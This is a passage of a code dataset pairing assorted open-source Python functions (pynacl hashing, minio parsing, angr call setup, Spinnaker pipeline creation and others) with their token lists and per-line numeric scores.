"image_url",
"if",
"self",
".",
"source_url",
":",
"data",
"[",
"'source_url'",
"]",
"=",
"self",
".",
"source_url",
"data",
"[",
"'views'",
"]",
"=",
"self",
".",
"views",
"data",
"[",
"'likes'",
"]",
"=",
"self",
".",
"likes",
"data",
"[",
"'saves'",
"]",
"=",
"self",
".",
"saves",
"data",
"[",
"'comments'",
"]",
"=",
"self",
".",
"comments",
"data",
"[",
"'nsfw'",
"]",
"=",
"self",
".",
"nsfw",
"data",
"[",
"'saved'",
"]",
"=",
"self",
".",
"saved",
"data",
"[",
"'liked'",
"]",
"=",
"self",
".",
"liked",
"return",
"data"
] | 30.510204 | [
0.038461538461538464,
0.18181818181818182,
0.03773584905660377,
0,
0.02631578947368421,
0,
0.15384615384615385,
0.04,
0.0392156862745098,
0,
0.13333333333333333,
0.061224489795918366,
0.18181818181818182,
0.11764705882352941,
0,
0.08,
0.045454545454545456,
0.09523809523809523,
0.05555555555555555,
0.09523809523809523,
0.044444444444444446,
0.09090909090909091,
0.05263157894736842,
0.07142857142857142,
0.04,
0.07692307692307693,
0.1111111111111111,
0.04,
0.11764705882352941,
0.037037037037037035,
0.07692307692307693,
0.043478260869565216,
0.09090909090909091,
0.05263157894736842,
0.08695652173913043,
0.05,
0.07692307692307693,
0.043478260869565216,
0.07407407407407407,
0.041666666666666664,
0.058823529411764705,
0.058823529411764705,
0.058823529411764705,
0.05,
0.0625,
0.058823529411764705,
0.058823529411764705,
0,
0.10526315789473684
] |
def do_init(self, fs_settings, global_quota):
fs_settings = deepcopy(fs_settings) # because we store some of the info, we need a deep copy
'''
If the same restrictions are applied for many destinations, we use the same job to avoid processing
files twice
'''
for sender_spec in fs_settings.sender_specs:
restrictions = sender_spec.restrictions
if restrictions in self.restriction_to_job:
self.restriction_to_job[restrictions].add_destinations(sender_spec.destinations)
else:
compressor = _CompressorJob(
next_task=self.get_next_task(),
sender_spec=sender_spec,
tmp_file_parts_basepath=fs_settings.tmp_file_parts_basepath,
should_split_small_files=fs_settings.should_split_small_files,
global_quota=global_quota)
self.restriction_to_job[restrictions] = compressor
compressor.register(self) | [
"def",
"do_init",
"(",
"self",
",",
"fs_settings",
",",
"global_quota",
")",
":",
"fs_settings",
"=",
"deepcopy",
"(",
"fs_settings",
")",
"# because we store some of the info, we need a deep copy",
"for",
"sender_spec",
"in",
"fs_settings",
".",
"sender_specs",
":",
"restrictions",
"=",
"sender_spec",
".",
"restrictions",
"if",
"restrictions",
"in",
"self",
".",
"restriction_to_job",
":",
"self",
".",
"restriction_to_job",
"[",
"restrictions",
"]",
".",
"add_destinations",
"(",
"sender_spec",
".",
"destinations",
")",
"else",
":",
"compressor",
"=",
"_CompressorJob",
"(",
"next_task",
"=",
"self",
".",
"get_next_task",
"(",
")",
",",
"sender_spec",
"=",
"sender_spec",
",",
"tmp_file_parts_basepath",
"=",
"fs_settings",
".",
"tmp_file_parts_basepath",
",",
"should_split_small_files",
"=",
"fs_settings",
".",
"should_split_small_files",
",",
"global_quota",
"=",
"global_quota",
")",
"self",
".",
"restriction_to_job",
"[",
"restrictions",
"]",
"=",
"compressor",
"compressor",
".",
"register",
"(",
"self",
")"
] | 53.631579 | [
0.022222222222222223,
0.0297029702970297,
0.18181818181818182,
0.028037383177570093,
0.10526315789473684,
0.18181818181818182,
0.038461538461538464,
0.0392156862745098,
0.03636363636363636,
0.03125,
0.11764705882352941,
0.06818181818181818,
0.058823529411764705,
0.06818181818181818,
0.05,
0.04878048780487805,
0.08695652173913043,
0.030303030303030304,
0.04878048780487805
] |
def inputAnalyzeCallback(self, *args, **kwargs):
"""
Test method for inputAnalzeCallback
This method loops over the passed number of files,
and optionally "delays" in each loop to simulate
some analysis. The delay length is specified by
the '--test <delay>' flag.
"""
b_status = False
filesRead = 0
filesAnalyzed = 0
for k, v in kwargs.items():
if k == 'filesRead': d_DCMRead = v
if k == 'path': str_path = v
if len(args):
at_data = args[0]
str_path = at_data[0]
d_read = at_data[1]
b_status = True
self.dp.qprint("analyzing:\n%s" %
self.pp.pformat(d_read['l_file']),
level = 5)
if int(self.f_sleepLength):
self.dp.qprint("sleeping for: %f" % self.f_sleepLength, level = 5)
time.sleep(self.f_sleepLength)
filesAnalyzed = len(d_read['l_file'])
return {
'status': b_status,
'filesAnalyzed': filesAnalyzed,
'l_file': d_read['l_file']
} | [
"def",
"inputAnalyzeCallback",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"b_status",
"=",
"False",
"filesRead",
"=",
"0",
"filesAnalyzed",
"=",
"0",
"for",
"k",
",",
"v",
"in",
"kwargs",
".",
"items",
"(",
")",
":",
"if",
"k",
"==",
"'filesRead'",
":",
"d_DCMRead",
"=",
"v",
"if",
"k",
"==",
"'path'",
":",
"str_path",
"=",
"v",
"if",
"len",
"(",
"args",
")",
":",
"at_data",
"=",
"args",
"[",
"0",
"]",
"str_path",
"=",
"at_data",
"[",
"0",
"]",
"d_read",
"=",
"at_data",
"[",
"1",
"]",
"b_status",
"=",
"True",
"self",
".",
"dp",
".",
"qprint",
"(",
"\"analyzing:\\n%s\"",
"%",
"self",
".",
"pp",
".",
"pformat",
"(",
"d_read",
"[",
"'l_file'",
"]",
")",
",",
"level",
"=",
"5",
")",
"if",
"int",
"(",
"self",
".",
"f_sleepLength",
")",
":",
"self",
".",
"dp",
".",
"qprint",
"(",
"\"sleeping for: %f\"",
"%",
"self",
".",
"f_sleepLength",
",",
"level",
"=",
"5",
")",
"time",
".",
"sleep",
"(",
"self",
".",
"f_sleepLength",
")",
"filesAnalyzed",
"=",
"len",
"(",
"d_read",
"[",
"'l_file'",
"]",
")",
"return",
"{",
"'status'",
":",
"b_status",
",",
"'filesAnalyzed'",
":",
"filesAnalyzed",
",",
"'l_file'",
":",
"d_read",
"[",
"'l_file'",
"]",
"}"
] | 33.297297 | [
0.020833333333333332,
0.18181818181818182,
0.046511627906976744,
0,
0.05084745762711865,
0.03571428571428571,
0.03636363636363636,
0.058823529411764705,
0,
0.18181818181818182,
0.08571428571428572,
0.0967741935483871,
0.0967741935483871,
0,
0.05714285714285714,
0.0784313725490196,
0.0784313725490196,
0,
0.09523809523809523,
0.08108108108108109,
0.075,
0.075,
0,
0.1,
0.09523809523809523,
0.04477611940298507,
0.07142857142857142,
0.05714285714285714,
0.05128205128205128,
0.047619047619047616,
0.06382978723404255,
0,
0.1875,
0.04878048780487805,
0.043478260869565216,
0.041666666666666664,
0.3333333333333333
] |
def crypto_shorthash_siphashx24(data, key):
"""Compute a fast, cryptographic quality, keyed hash of the input data
:param data:
:type data: bytes
:param key: len(key) must be equal to
:py:data:`.XKEYBYTES` (16)
:type key: bytes
"""
if len(key) != XKEYBYTES:
raise exc.ValueError(
"Key length must be exactly {0} bytes".format(XKEYBYTES))
digest = ffi.new("unsigned char[]", XBYTES)
rc = lib.crypto_shorthash_siphashx24(digest, data, len(data), key)
ensure(rc == 0, raising=exc.RuntimeError)
return ffi.buffer(digest, XBYTES)[:] | [
"def",
"crypto_shorthash_siphashx24",
"(",
"data",
",",
"key",
")",
":",
"if",
"len",
"(",
"key",
")",
"!=",
"XKEYBYTES",
":",
"raise",
"exc",
".",
"ValueError",
"(",
"\"Key length must be exactly {0} bytes\"",
".",
"format",
"(",
"XKEYBYTES",
")",
")",
"digest",
"=",
"ffi",
".",
"new",
"(",
"\"unsigned char[]\"",
",",
"XBYTES",
")",
"rc",
"=",
"lib",
".",
"crypto_shorthash_siphashx24",
"(",
"digest",
",",
"data",
",",
"len",
"(",
"data",
")",
",",
"key",
")",
"ensure",
"(",
"rc",
"==",
"0",
",",
"raising",
"=",
"exc",
".",
"RuntimeError",
")",
"return",
"ffi",
".",
"buffer",
"(",
"digest",
",",
"XBYTES",
")",
"[",
":",
"]"
] | 34.882353 | [
0.023255813953488372,
0.02702702702702703,
0,
0.1875,
0.14285714285714285,
0.07317073170731707,
0.14285714285714285,
0.15,
0.2857142857142857,
0.06896551724137931,
0.10344827586206896,
0.043478260869565216,
0.0425531914893617,
0.02857142857142857,
0,
0.044444444444444446,
0.05
] |
def parse_copy_object(bucket_name, object_name, data):
"""
Parser for copy object response.
:param data: Response data for copy object.
:return: :class:`CopyObjectResult <CopyObjectResult>`
"""
root = S3Element.fromstring('CopyObjectResult', data)
return CopyObjectResult(
bucket_name, object_name,
root.get_etag_elem(),
root.get_localized_time_elem('LastModified')
) | [
"def",
"parse_copy_object",
"(",
"bucket_name",
",",
"object_name",
",",
"data",
")",
":",
"root",
"=",
"S3Element",
".",
"fromstring",
"(",
"'CopyObjectResult'",
",",
"data",
")",
"return",
"CopyObjectResult",
"(",
"bucket_name",
",",
"object_name",
",",
"root",
".",
"get_etag_elem",
"(",
")",
",",
"root",
".",
"get_localized_time_elem",
"(",
"'LastModified'",
")",
")"
] | 29.428571 | [
0.018518518518518517,
0.2857142857142857,
0.05555555555555555,
0,
0.06382978723404255,
0.15789473684210525,
0.2857142857142857,
0.03508771929824561,
0,
0.10714285714285714,
0.06060606060606061,
0.06896551724137931,
0.038461538461538464,
0.6
] |
def to_pandas(self):
"""Convert to pandas MultiIndex.
Returns
-------
pandas.base.MultiIndex
"""
if not all(ind.is_raw() for ind in self.values):
raise ValueError('Cannot convert to pandas MultiIndex if not evaluated.')
from pandas import MultiIndex as PandasMultiIndex
arrays = [ind.values for ind in self.values]
return PandasMultiIndex.from_arrays(arrays, names=self.names) | [
"def",
"to_pandas",
"(",
"self",
")",
":",
"if",
"not",
"all",
"(",
"ind",
".",
"is_raw",
"(",
")",
"for",
"ind",
"in",
"self",
".",
"values",
")",
":",
"raise",
"ValueError",
"(",
"'Cannot convert to pandas MultiIndex if not evaluated.'",
")",
"from",
"pandas",
"import",
"MultiIndex",
"as",
"PandasMultiIndex",
"arrays",
"=",
"[",
"ind",
".",
"values",
"for",
"ind",
"in",
"self",
".",
"values",
"]",
"return",
"PandasMultiIndex",
".",
"from_arrays",
"(",
"arrays",
",",
"names",
"=",
"self",
".",
"names",
")"
] | 28.125 | [
0.05,
0.05,
0,
0.13333333333333333,
0.13333333333333333,
0.06666666666666667,
0,
0.18181818181818182,
0.03571428571428571,
0.03529411764705882,
0,
0.03508771929824561,
0,
0.038461538461538464,
0,
0.028985507246376812
] |
def fixup_scipy_ndimage_result(whatever_it_returned):
"""Convert a result from scipy.ndimage to a numpy array
scipy.ndimage has the annoying habit of returning a single, bare
value instead of an array if the indexes passed in are of length 1.
For instance:
scind.maximum(image, labels, [1]) returns a float
but
scind.maximum(image, labels, [1,2]) returns a list
"""
if getattr(whatever_it_returned,"__getitem__",False):
return np.array(whatever_it_returned)
else:
return np.array([whatever_it_returned]) | [
"def",
"fixup_scipy_ndimage_result",
"(",
"whatever_it_returned",
")",
":",
"if",
"getattr",
"(",
"whatever_it_returned",
",",
"\"__getitem__\"",
",",
"False",
")",
":",
"return",
"np",
".",
"array",
"(",
"whatever_it_returned",
")",
"else",
":",
"return",
"np",
".",
"array",
"(",
"[",
"whatever_it_returned",
"]",
")"
] | 39.357143 | [
0.018867924528301886,
0.03389830508474576,
0.5,
0.029411764705882353,
0.028169014084507043,
0.11764705882352941,
0.03773584905660377,
0.2857142857142857,
0.05555555555555555,
0.2857142857142857,
0.07017543859649122,
0.044444444444444446,
0.2222222222222222,
0.0425531914893617
] |
def get_message(self, message_id, *args, **kwargs):
"""Return a Message object corresponding to the given ID.
:param message_id: The ID or Fullname for a Message
The additional parameters are passed directly into
:meth:`~praw.objects.Message.from_id` of Message, and subsequently into
:meth:`.request_json`.
"""
return objects.Message.from_id(self, message_id, *args, **kwargs) | [
"def",
"get_message",
"(",
"self",
",",
"message_id",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"return",
"objects",
".",
"Message",
".",
"from_id",
"(",
"self",
",",
"message_id",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")"
] | 38.727273 | [
0.0196078431372549,
0.03076923076923077,
0,
0.05084745762711865,
0,
0.034482758620689655,
0.06329113924050633,
0.16666666666666666,
0,
0.18181818181818182,
0.0273972602739726
] |
def argmax_with_score(logits, axis=None):
"""Argmax along with the value."""
axis = axis or len(logits.get_shape()) - 1
predictions = tf.argmax(logits, axis=axis)
logits_shape = shape_list(logits)
prefix_shape, vocab_size = logits_shape[:-1], logits_shape[-1]
prefix_size = 1
for d in prefix_shape:
prefix_size *= d
# Flatten to extract scores
flat_logits = tf.reshape(logits, [prefix_size, vocab_size])
flat_predictions = tf.reshape(predictions, [prefix_size])
flat_indices = tf.stack(
[tf.range(tf.to_int64(prefix_size)),
tf.to_int64(flat_predictions)],
axis=1)
flat_scores = tf.gather_nd(flat_logits, flat_indices)
# Unflatten
scores = tf.reshape(flat_scores, prefix_shape)
return predictions, scores | [
"def",
"argmax_with_score",
"(",
"logits",
",",
"axis",
"=",
"None",
")",
":",
"axis",
"=",
"axis",
"or",
"len",
"(",
"logits",
".",
"get_shape",
"(",
")",
")",
"-",
"1",
"predictions",
"=",
"tf",
".",
"argmax",
"(",
"logits",
",",
"axis",
"=",
"axis",
")",
"logits_shape",
"=",
"shape_list",
"(",
"logits",
")",
"prefix_shape",
",",
"vocab_size",
"=",
"logits_shape",
"[",
":",
"-",
"1",
"]",
",",
"logits_shape",
"[",
"-",
"1",
"]",
"prefix_size",
"=",
"1",
"for",
"d",
"in",
"prefix_shape",
":",
"prefix_size",
"*=",
"d",
"# Flatten to extract scores",
"flat_logits",
"=",
"tf",
".",
"reshape",
"(",
"logits",
",",
"[",
"prefix_size",
",",
"vocab_size",
"]",
")",
"flat_predictions",
"=",
"tf",
".",
"reshape",
"(",
"predictions",
",",
"[",
"prefix_size",
"]",
")",
"flat_indices",
"=",
"tf",
".",
"stack",
"(",
"[",
"tf",
".",
"range",
"(",
"tf",
".",
"to_int64",
"(",
"prefix_size",
")",
")",
",",
"tf",
".",
"to_int64",
"(",
"flat_predictions",
")",
"]",
",",
"axis",
"=",
"1",
")",
"flat_scores",
"=",
"tf",
".",
"gather_nd",
"(",
"flat_logits",
",",
"flat_indices",
")",
"# Unflatten",
"scores",
"=",
"tf",
".",
"reshape",
"(",
"flat_scores",
",",
"prefix_shape",
")",
"return",
"predictions",
",",
"scores"
] | 30.708333 | [
0.024390243902439025,
0.08333333333333333,
0.06818181818181818,
0.06818181818181818,
0,
0.08571428571428572,
0.046875,
0.17647058823529413,
0.125,
0.1,
0,
0.10344827586206896,
0.04918032786885246,
0.05084745762711865,
0.15384615384615385,
0.09523809523809523,
0.10526315789473684,
0.38461538461538464,
0.05454545454545454,
0,
0.23076923076923078,
0.0625,
0,
0.10714285714285714
] |
def destroy(self, uuid):
"""
Destroy a kvm domain by uuid
:param uuid: uuid of the kvm container (same as the used in create)
:return:
"""
args = {
'uuid': uuid,
}
self._domain_action_chk.check(args)
self._client.sync('kvm.destroy', args) | [
"def",
"destroy",
"(",
"self",
",",
"uuid",
")",
":",
"args",
"=",
"{",
"'uuid'",
":",
"uuid",
",",
"}",
"self",
".",
"_domain_action_chk",
".",
"check",
"(",
"args",
")",
"self",
".",
"_client",
".",
"sync",
"(",
"'kvm.destroy'",
",",
"args",
")"
] | 26 | [
0.041666666666666664,
0.18181818181818182,
0.05555555555555555,
0.05333333333333334,
0.1875,
0.18181818181818182,
0.1875,
0.08,
0.3333333333333333,
0.046511627906976744,
0,
0.043478260869565216
] |
def setup_callsite(self, state, ret_addr, args, stack_base=None, alloc_base=None, grow_like_stack=True):
"""
This function performs the actions of the caller getting ready to jump into a function.
:param state: The SimState to operate on
:param ret_addr: The address to return to when the called function finishes
:param args: The list of arguments that that the called function will see
:param stack_base: An optional pointer to use as the top of the stack, circa the function entry point
:param alloc_base: An optional pointer to use as the place to put excess argument data
:param grow_like_stack: When allocating data at alloc_base, whether to allocate at decreasing addresses
The idea here is that you can provide almost any kind of python type in `args` and it'll be translated to a
binary format to be placed into simulated memory. Lists (representing arrays) must be entirely elements of the
same type and size, while tuples (representing structs) can be elements of any type and size.
If you'd like there to be a pointer to a given value, wrap the value in a `PointerWrapper`. Any value
that can't fit in a register will be automatically put in a PointerWrapper.
If stack_base is not provided, the current stack pointer will be used, and it will be updated.
If alloc_base is not provided, the stack base will be used and grow_like_stack will implicitly be True.
grow_like_stack controls the behavior of allocating data at alloc_base. When data from args needs to be wrapped
in a pointer, the pointer needs to point somewhere, so that data is dumped into memory at alloc_base. If you
set alloc_base to point to somewhere other than the stack, set grow_like_stack to False so that sequential
allocations happen at increasing addresses.
"""
# STEP 0: clerical work
if isinstance(self, SimCCSoot):
SimEngineSoot.setup_callsite(state, args, ret_addr)
return
allocator = AllocHelper(self.arch.bits, self.arch.memory_endness == 'Iend_LE')
#
# STEP 1: convert all values into serialized form
# this entails creating the vals list of simple values to store and also populating the allocator's
# understanding of what aux data needs to be stored
# This is also where we compute arg locations (arg_locs)
#
if self.func_ty is not None:
vals = [self._standardize_value(arg, ty, state, allocator.dump) for arg, ty in zip(args, self.func_ty.args)]
else:
vals = [self._standardize_value(arg, None, state, allocator.dump) for arg in args]
arg_session = self.arg_session
arg_locs = [None]*len(args)
for i, (arg, val) in enumerate(zip(args, vals)):
if self.is_fp_value(arg) or \
(self.func_ty is not None and isinstance(self.func_ty.args[i], SimTypeFloat)):
arg_locs[i] = arg_session.next_arg(is_fp=True, size=val.length // state.arch.byte_width)
continue
if val.length > state.arch.bits or (self.func_ty is None and isinstance(arg, (bytes, str, list, tuple))):
vals[i] = allocator.dump(val, state)
elif val.length < state.arch.bits:
if self.arch.memory_endness == 'Iend_LE':
vals[i] = val.concat(claripy.BVV(0, state.arch.bits - val.length))
else:
vals[i] = claripy.BVV(0, state.arch.bits - val.length).concat(val)
arg_locs[i] = arg_session.next_arg(is_fp=False, size=vals[i].length // state.arch.byte_width)
#
# STEP 2: decide on memory storage locations
# implement the contract for stack_base/alloc_base/grow_like_stack
# after this, stack_base should be the final stack pointer, alloc_base should be the final aux storage location,
# and the stack pointer should be updated
#
if stack_base is None:
if alloc_base is None:
alloc_size = allocator.size()
state.regs.sp -= alloc_size
alloc_base = state.regs.sp
grow_like_stack = False
state.regs.sp -= self.stack_space(arg_locs)
# handle alignment
alignment = (state.regs.sp + self.STACKARG_SP_DIFF) % self.STACK_ALIGNMENT
state.regs.sp -= alignment
else:
state.regs.sp = stack_base
if alloc_base is None:
alloc_base = stack_base + self.stack_space(arg_locs)
grow_like_stack = False
if grow_like_stack:
alloc_base -= allocator.size()
if type(alloc_base) is int:
alloc_base = claripy.BVV(alloc_base, state.arch.bits)
for i, val in enumerate(vals):
vals[i] = allocator.translate(val, alloc_base)
#
# STEP 3: store everything!
#
allocator.apply(state, alloc_base)
for loc, val in zip(arg_locs, vals):
if val.length > loc.size * 8:
raise ValueError("Can't fit value {} into location {}".format(repr(val), repr(loc)))
loc.set_value(state, val, endness='Iend_BE', stack_base=stack_base)
self.return_addr.set_value(state, ret_addr, stack_base=stack_base) | [
"def",
"setup_callsite",
"(",
"self",
",",
"state",
",",
"ret_addr",
",",
"args",
",",
"stack_base",
"=",
"None",
",",
"alloc_base",
"=",
"None",
",",
"grow_like_stack",
"=",
"True",
")",
":",
"# STEP 0: clerical work",
"if",
"isinstance",
"(",
"self",
",",
"SimCCSoot",
")",
":",
"SimEngineSoot",
".",
"setup_callsite",
"(",
"state",
",",
"args",
",",
"ret_addr",
")",
"return",
"allocator",
"=",
"AllocHelper",
"(",
"self",
".",
"arch",
".",
"bits",
",",
"self",
".",
"arch",
".",
"memory_endness",
"==",
"'Iend_LE'",
")",
"#",
"# STEP 1: convert all values into serialized form",
"# this entails creating the vals list of simple values to store and also populating the allocator's",
"# understanding of what aux data needs to be stored",
"# This is also where we compute arg locations (arg_locs)",
"#",
"if",
"self",
".",
"func_ty",
"is",
"not",
"None",
":",
"vals",
"=",
"[",
"self",
".",
"_standardize_value",
"(",
"arg",
",",
"ty",
",",
"state",
",",
"allocator",
".",
"dump",
")",
"for",
"arg",
",",
"ty",
"in",
"zip",
"(",
"args",
",",
"self",
".",
"func_ty",
".",
"args",
")",
"]",
"else",
":",
"vals",
"=",
"[",
"self",
".",
"_standardize_value",
"(",
"arg",
",",
"None",
",",
"state",
",",
"allocator",
".",
"dump",
")",
"for",
"arg",
"in",
"args",
"]",
"arg_session",
"=",
"self",
".",
"arg_session",
"arg_locs",
"=",
"[",
"None",
"]",
"*",
"len",
"(",
"args",
")",
"for",
"i",
",",
"(",
"arg",
",",
"val",
")",
"in",
"enumerate",
"(",
"zip",
"(",
"args",
",",
"vals",
")",
")",
":",
"if",
"self",
".",
"is_fp_value",
"(",
"arg",
")",
"or",
"(",
"self",
".",
"func_ty",
"is",
"not",
"None",
"and",
"isinstance",
"(",
"self",
".",
"func_ty",
".",
"args",
"[",
"i",
"]",
",",
"SimTypeFloat",
")",
")",
":",
"arg_locs",
"[",
"i",
"]",
"=",
"arg_session",
".",
"next_arg",
"(",
"is_fp",
"=",
"True",
",",
"size",
"=",
"val",
".",
"length",
"//",
"state",
".",
"arch",
".",
"byte_width",
")",
"continue",
"if",
"val",
".",
"length",
">",
"state",
".",
"arch",
".",
"bits",
"or",
"(",
"self",
".",
"func_ty",
"is",
"None",
"and",
"isinstance",
"(",
"arg",
",",
"(",
"bytes",
",",
"str",
",",
"list",
",",
"tuple",
")",
")",
")",
":",
"vals",
"[",
"i",
"]",
"=",
"allocator",
".",
"dump",
"(",
"val",
",",
"state",
")",
"elif",
"val",
".",
"length",
"<",
"state",
".",
"arch",
".",
"bits",
":",
"if",
"self",
".",
"arch",
".",
"memory_endness",
"==",
"'Iend_LE'",
":",
"vals",
"[",
"i",
"]",
"=",
"val",
".",
"concat",
"(",
"claripy",
".",
"BVV",
"(",
"0",
",",
"state",
".",
"arch",
".",
"bits",
"-",
"val",
".",
"length",
")",
")",
"else",
":",
"vals",
"[",
"i",
"]",
"=",
"claripy",
".",
"BVV",
"(",
"0",
",",
"state",
".",
"arch",
".",
"bits",
"-",
"val",
".",
"length",
")",
".",
"concat",
"(",
"val",
")",
"arg_locs",
"[",
"i",
"]",
"=",
"arg_session",
".",
"next_arg",
"(",
"is_fp",
"=",
"False",
",",
"size",
"=",
"vals",
"[",
"i",
"]",
".",
"length",
"//",
"state",
".",
"arch",
".",
"byte_width",
")",
"#",
"# STEP 2: decide on memory storage locations",
"# implement the contract for stack_base/alloc_base/grow_like_stack",
"# after this, stack_base should be the final stack pointer, alloc_base should be the final aux storage location,",
"# and the stack pointer should be updated",
"#",
"if",
"stack_base",
"is",
"None",
":",
"if",
"alloc_base",
"is",
"None",
":",
"alloc_size",
"=",
"allocator",
".",
"size",
"(",
")",
"state",
".",
"regs",
".",
"sp",
"-=",
"alloc_size",
"alloc_base",
"=",
"state",
".",
"regs",
".",
"sp",
"grow_like_stack",
"=",
"False",
"state",
".",
"regs",
".",
"sp",
"-=",
"self",
".",
"stack_space",
"(",
"arg_locs",
")",
"# handle alignment",
"alignment",
"=",
"(",
"state",
".",
"regs",
".",
"sp",
"+",
"self",
".",
"STACKARG_SP_DIFF",
")",
"%",
"self",
".",
"STACK_ALIGNMENT",
"state",
".",
"regs",
".",
"sp",
"-=",
"alignment",
"else",
":",
"state",
".",
"regs",
".",
"sp",
"=",
"stack_base",
"if",
"alloc_base",
"is",
"None",
":",
"alloc_base",
"=",
"stack_base",
"+",
"self",
".",
"stack_space",
"(",
"arg_locs",
")",
"grow_like_stack",
"=",
"False",
"if",
"grow_like_stack",
":",
"alloc_base",
"-=",
"allocator",
".",
"size",
"(",
")",
"if",
"type",
"(",
"alloc_base",
")",
"is",
"int",
":",
"alloc_base",
"=",
"claripy",
".",
"BVV",
"(",
"alloc_base",
",",
"state",
".",
"arch",
".",
"bits",
")",
"for",
"i",
",",
"val",
"in",
"enumerate",
"(",
"vals",
")",
":",
"vals",
"[",
"i",
"]",
"=",
"allocator",
".",
"translate",
"(",
"val",
",",
"alloc_base",
")",
"#",
"# STEP 3: store everything!",
"#",
"allocator",
".",
"apply",
"(",
"state",
",",
"alloc_base",
")",
"for",
"loc",
",",
"val",
"in",
"zip",
"(",
"arg_locs",
",",
"vals",
")",
":",
"if",
"val",
".",
"length",
">",
"loc",
".",
"size",
"*",
"8",
":",
"raise",
"ValueError",
"(",
"\"Can't fit value {} into location {}\"",
".",
"format",
"(",
"repr",
"(",
"val",
")",
",",
"repr",
"(",
"loc",
")",
")",
")",
"loc",
".",
"set_value",
"(",
"state",
",",
"val",
",",
"endness",
"=",
"'Iend_BE'",
",",
"stack_base",
"=",
"stack_base",
")",
"self",
".",
"return_addr",
".",
"set_value",
"(",
"state",
",",
"ret_addr",
",",
"stack_base",
"=",
"stack_base",
")"
] | 49.444444 | [
0.019230769230769232,
0.18181818181818182,
0.031578947368421054,
0,
0.05172413793103448,
0.044444444444444446,
0.043478260869565216,
0.03508771929824561,
0.04040404040404041,
0.036036036036036036,
0,
0.034782608695652174,
0.03389830508474576,
0.039603960396039604,
0.03669724770642202,
0.03614457831325301,
0,
0.029411764705882353,
0.02702702702702703,
0,
0.025210084033613446,
0.02586206896551724,
0.02631578947368421,
0.0392156862745098,
0.18181818181818182,
0,
0.06451612903225806,
0,
0.05128205128205128,
0.031746031746031744,
0.1111111111111111,
0,
0.03488372093023256,
0,
0.2222222222222222,
0.03508771929824561,
0.028037383177570093,
0.03389830508474576,
0.03125,
0.2222222222222222,
0,
0.05555555555555555,
0.025,
0.15384615384615385,
0.031914893617021274,
0,
0.05263157894736842,
0.05714285714285714,
0.03571428571428571,
0.04878048780487805,
0.030612244897959183,
0.028846153846153848,
0.08333333333333333,
0.02564102564102564,
0.038461538461538464,
0.043478260869565216,
0.03508771929824561,
0.03488372093023256,
0.09523809523809523,
0.03488372093023256,
0.02857142857142857,
0,
0.2222222222222222,
0.038461538461538464,
0.02702702702702703,
0.025,
0.04081632653061224,
0.2222222222222222,
0,
0.06666666666666667,
0.058823529411764705,
0.044444444444444446,
0.046511627906976744,
0.047619047619047616,
0.05128205128205128,
0,
0.03636363636363636,
0,
0.06666666666666667,
0.03488372093023256,
0.05263157894736842,
0,
0.15384615384615385,
0.05263157894736842,
0,
0.058823529411764705,
0.029411764705882353,
0.05128205128205128,
0,
0.07407407407407407,
0.047619047619047616,
0.05714285714285714,
0.03076923076923077,
0,
0.05263157894736842,
0.034482758620689655,
0,
0.2222222222222222,
0.05714285714285714,
0.2222222222222222,
0,
0.047619047619047616,
0,
0.045454545454545456,
0.04878048780487805,
0.03,
0.02531645569620253,
0.02702702702702703
] |
def add_net_values_to_bar_plot(axs, color='k'):
"""Add net values next to an existing vertical stacked bar chart
Parameters
----------
axs : matplotlib.Axes or list thereof
color : str, optional, default: black
the color of the bars to add
"""
axs = axs if isinstance(axs, Iterable) else [axs]
for ax in axs:
box_args = _get_boxes(ax)
for x, args in box_args.items():
rect = mpatches.Rectangle(*args, color=color)
ax.add_patch(rect) | [
"def",
"add_net_values_to_bar_plot",
"(",
"axs",
",",
"color",
"=",
"'k'",
")",
":",
"axs",
"=",
"axs",
"if",
"isinstance",
"(",
"axs",
",",
"Iterable",
")",
"else",
"[",
"axs",
"]",
"for",
"ax",
"in",
"axs",
":",
"box_args",
"=",
"_get_boxes",
"(",
"ax",
")",
"for",
"x",
",",
"args",
"in",
"box_args",
".",
"items",
"(",
")",
":",
"rect",
"=",
"mpatches",
".",
"Rectangle",
"(",
"*",
"args",
",",
"color",
"=",
"color",
")",
"ax",
".",
"add_patch",
"(",
"rect",
")"
] | 33.266667 | [
0.02127659574468085,
0.029411764705882353,
0,
0.14285714285714285,
0.14285714285714285,
0.07317073170731707,
0.07317073170731707,
0.05555555555555555,
0.2857142857142857,
0.03773584905660377,
0.1111111111111111,
0.06060606060606061,
0.05,
0.03508771929824561,
0.06666666666666667
] |
def create_pipeline(self, onetime=None):
"""Create the spinnaker pipeline(s)."""
utils.banner("Creating Pipeline")
kwargs = {
'app': self.app,
'trigger_job': self.trigger_job,
'prop_path': self.json_path,
'base': None,
'runway_dir': self.runway_dir,
}
pipeline_type = self.configs['pipeline']['type']
if pipeline_type not in consts.ALLOWED_TYPES:
raise NotImplementedError('Pipeline type "{0}" not permitted.'.format(pipeline_type))
if not onetime:
if pipeline_type == 'lambda':
spinnakerpipeline = pipeline.SpinnakerPipelineLambda(**kwargs)
elif pipeline_type == 's3':
spinnakerpipeline = pipeline.SpinnakerPipelineS3(**kwargs)
elif pipeline_type == 'datapipeline':
spinnakerpipeline = pipeline.SpinnakerPipelineDataPipeline(**kwargs)
elif pipeline_type == 'manual':
spinnakerpipeline = pipeline.SpinnakerPipelineManual(**kwargs)
else:
# Handles all other pipelines
spinnakerpipeline = pipeline.SpinnakerPipeline(**kwargs)
else:
spinnakerpipeline = pipeline.SpinnakerPipelineOnetime(onetime=onetime, **kwargs)
spinnakerpipeline.create_pipeline() | [
"def",
"create_pipeline",
"(",
"self",
",",
"onetime",
"=",
"None",
")",
":",
"utils",
".",
"banner",
"(",
"\"Creating Pipeline\"",
")",
"kwargs",
"=",
"{",
"'app'",
":",
"self",
".",
"app",
",",
"'trigger_job'",
":",
"self",
".",
"trigger_job",
",",
"'prop_path'",
":",
"self",
".",
"json_path",
",",
"'base'",
":",
"None",
",",
"'runway_dir'",
":",
"self",
".",
"runway_dir",
",",
"}",
"pipeline_type",
"=",
"self",
".",
"configs",
"[",
"'pipeline'",
"]",
"[",
"'type'",
"]",
"if",
"pipeline_type",
"not",
"in",
"consts",
".",
"ALLOWED_TYPES",
":",
"raise",
"NotImplementedError",
"(",
"'Pipeline type \"{0}\" not permitted.'",
".",
"format",
"(",
"pipeline_type",
")",
")",
"if",
"not",
"onetime",
":",
"if",
"pipeline_type",
"==",
"'lambda'",
":",
"spinnakerpipeline",
"=",
"pipeline",
